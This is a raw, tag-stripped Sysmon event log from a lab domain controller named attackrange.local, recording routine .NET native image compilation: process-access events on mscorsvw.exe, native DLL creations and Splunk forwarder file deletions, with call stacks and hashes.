21:06:12.812{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A244-60D3-AD04-00000000CF01}772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021885Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A244-60D3-AC04-00000000CF01}1324C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021884Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.765{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A244-60D3-AC04-00000000CF01}1324C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021883Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.765{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A244-60D3-AC04-00000000CF01}1324C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021882Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.765{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F49DEC45621D1F182AA3312AADD4C742,SHA256=A22FE79D2DA135524236FBC9C2EEDD9390CAEE4BB625D8D9AEA94A5388C91F1D,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021881Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:12.687{4DB9351A-A244-60D3-AB04-00000000CF01}6628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19e4-0\System.Printing.dll2021-06-23 21:06:12.687 23542300x800000000000000021880Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.671{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A34678BAA70FCFED80AA30578D68810,SHA256=92D959A2CAAF3D0618FF379467B1E5BA4EACEB19C8EF6B85E17D1A9BAD44A339,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021879Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.218{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A244-60D3-AB04-00000000CF01}6628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021878Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.203{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A244-60D3-AB04-00000000CF01}6628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021877Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.203{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A244-60D3-AB04-00000000CF01}6628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021876Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.156{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A244-60D3-AA04-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021875Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.140{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A244-60D3-AA04-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021874Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.140{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A244-60D3-AA04-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021873Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:12.062{4DB9351A-A243-60D3-A904-00000000CF01}3112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c28-0\System.Numerics.dll2021-06-23 21:06:12.062 10341000x800000000000000021913Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.984{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A245-60D3-B404-00000000CF01}4860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021912Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.984{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A245-60D3-B404-00000000CF01}4860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021911Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:13.921{4DB9351A-A245-60D3-B304-00000000CF01}5980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\175c-0\System.Runtime.Serialization.Formatters.Soap.dll2021-06-23 21:06:13.921 10341000x800000000000000021910Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.765{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A245-60D3-B304-00000000CF01}5980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021909Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.749{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A245-60D3-B304-00000000CF01}5980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021908Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.749{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A245-60D3-B304-00000000CF01}5980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021907Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.718{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A245-60D3-B204-00000000CF01}6880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021906Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.703{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB03C2FB5EADFEE80B8137D73A939D18,SHA256=66677E565872D64488A8710AD8CFF5DDA128C8DF3BDB36FDE2A292489782592C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021905Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.703{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A245-60D3-B204-00000000CF01}6880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021904Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.703{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A245-60D3-B204-00000000CF01}6880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021903Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:13.624{4DB9351A-A245-60D3-B104-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f98-0\System.Runtime.DurableInstancing.dll2021-06-23 21:06:13.624 10341000x800000000000000021902Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.390{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A245-60D3-B104-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021901Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.374{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A245-60D3-B104-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021900Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:13.374{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A245-60D3-B104-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\F